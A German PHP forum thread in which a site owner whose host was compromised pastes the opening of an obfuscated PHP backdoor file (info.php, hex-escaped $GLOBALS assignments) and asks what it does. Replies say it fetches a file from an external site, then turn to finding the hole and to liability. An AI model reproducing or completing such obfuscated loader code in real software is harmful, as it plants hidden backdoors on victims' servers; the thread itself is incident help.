php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > Sonstiges > Off-Topic Diskussionen
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


Off-Topic Diskussionen Kein Platz für Deine Frage gefunden? Dann bist Du hier genau richtig!

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 04-01-2014, 08:22
danibert
 Registrierter Benutzer
Links : Onlinestatus : danibert ist offline
Registriert seit: Jun 2009
Beiträge: 32
danibert befindet sich auf einem aufstrebenden Ast
Standard Site gehackt -> Bitte um Rat

Hallo zusammen,

gestern wurde meine Website gehackt, und ein Ordner namens "media" darauf abgelegt. Im Ordner befinden sich eine .htaccess Datei, welche alle Aufrufe auf die Datei info.php umleitet. Mein Webhoster hat mir vorsorglich gleich den Account gesperrt.

Die info.php habe ich mir angeschaut, werde aber überhaupt nicht schlau, was hier passiert. So sieht der Inhalt aus (hier nur ein Teil):
PHP-Code:
<?php ${"\x47\x4cO\x42\x41\x4c\x53"}["\x6a\x62\x74\x76cvf"]="\x69\x70\x73";${"\x47LO\x42\x41\x4cS"}["\x68c\x7a\x6dyc\x63\x71a"]="\x69p";${"\x47\x4cO\x42\x41\x4cS"}["\x78fx\x66c\x64"]="\x75r\x69";${"\x47L\x4fB\x41L\x53"}["\x79\x73f\x79\x66\x6f"]="fu\x6ec";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x68\x76f\x72ulz\x72"]="\x68\x65ade\x72\x73";$
... und so weiter. Die komplette Datei habe ich hier hochgeladen: cshare.de - Download info.php

Wenn ich die Datei lokal ausführe, erhalte ich nur eine leere Seite.
Könnt Ihr mir sagen, was die Datei macht?

Danke für alle Tipps
Mit Zitat antworten
  #2 (permalink)  
Alt 04-01-2014, 10:48
h3ll
 Registrierter Benutzer
Links : Onlinestatus : h3ll ist offline
Registriert seit: Mar 2008
Beiträge: 3.563
h3ll befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Zitat von danibert Beitrag anzeigen
Könnt Ihr mir sagen, was die Datei macht?
Sie lädt eine Datei von einer externen Seite und sendet sie an den Browser.
Mit Zitat antworten
  #3 (permalink)  
Alt 20-05-2014, 11:36
Benutzerbild von Thromervair Thromervair
 Registrierter Benutzer
Links : Onlinestatus : Thromervair ist offline
Registriert seit: May 2014
Beiträge: 17
Thromervair befindet sich auf einem aufstrebenden Ast
Standard

Hast du schon herausgefunden wo die Lücke ist? Das sie nicht noch mal kommen können wenn du alles wieder bereinigt hast.
Mit Zitat antworten
  #4 (permalink)  
Alt 04-11-2014, 13:21
DominikHaus
 Registrierter Benutzer
Links : Onlinestatus : DominikHaus ist offline
Registriert seit: Nov 2014
Beiträge: 14
DominikHaus befindet sich auf einem aufstrebenden Ast
Standard

Eine Frage. Wer haftet bei solchen Hacks, wenn Daten geklaut werden?
Mit Zitat antworten
  #5 (permalink)  
Alt 04-11-2014, 13:45
Benutzerbild von Berni Berni
  OWNER
Links : Onlinestatus : Berni ist offline
Registriert seit: Jan 2001
Ort: Frankfurt / Egelsbach
Beiträge: 6.306
Blog-Einträge: 6
Berni befindet sich auf einem aufstrebenden Ast
Standard

Das kann man so pauschal nicht beantworten.
Wenn du grob fahrlässig mit den Daten umgegangen bist, dann wohl du.
__________________

php-Entwicklung | ebiz-consult.de
PHP-Webhosting für PHP Entwickler | ebiz-webhosting.de
die PHP Marktplatz-Software | ebiz-trader.de
Mit Zitat antworten
  #6 (permalink)  
Alt 08-01-2015, 17:03
faster
 Registrierter Benutzer
Links : Onlinestatus : faster ist offline
Registriert seit: Nov 2014
Beiträge: 10
faster befindet sich auf einem aufstrebenden Ast
Standard

Sonst der Hoster oder wie?
Mit Zitat antworten
  #7 (permalink)  
Alt 09-01-2015, 13:28
Benutzerbild von Berni Berni
  OWNER
Links : Onlinestatus : Berni ist offline
Registriert seit: Jan 2001
Ort: Frankfurt / Egelsbach
Beiträge: 6.306
Blog-Einträge: 6
Berni befindet sich auf einem aufstrebenden Ast
Standard

nö, warum auch!
__________________

php-Entwicklung | ebiz-consult.de
PHP-Webhosting für PHP Entwickler | ebiz-webhosting.de
die PHP Marktplatz-Software | ebiz-trader.de
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Bitte um Hilfe Website wurde gehackt JoeBassin PHP Developer Forum 17 04-03-2010 12:49
bin absoluter neuling! kann mir bitte jemand mal ein script erklären! BITTE BITTE somebody1981 Projekthilfe 3 26-07-2005 00:28
Bitte um Rat MaSchu Off-Topic Diskussionen 4 20-04-2004 22:56
ftp-server und site to site mrhappiness Off-Topic Diskussionen 2 22-04-2003 11:05

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni

Wissensbestand in Unternehmen
Wissensbestand in UnternehmenLebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen

25.05.2018 | Berni


 

Aktuelle PHP Scripte

html5pattern ansehen html5pattern

Pflichtfelder und Eingabevorgaben für Formulare validieren

06.07.2018 Berni | Kategorie: HTML5/ HowTo
Adventure PHP Framework

Das Adventure PHP Framework versteht sich als Hilfsmittel zur Implementierung von objektorientierten, generischen und wiederverwendbaren PHP-Web-Applikationen.

05.07.2018 phpler | Kategorie: PHP/ Framework
Phpstorm ansehen Phpstorm

Umfangreiche Entwicklungsumgebung für PHP-Programmierer inkl JavaScript und HTML Support. Jetzt Version 8.0!

03.07.2018 Berni | Kategorie: PHP ENTWICKLUNGSUMGEBUNG
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 03:52 Uhr.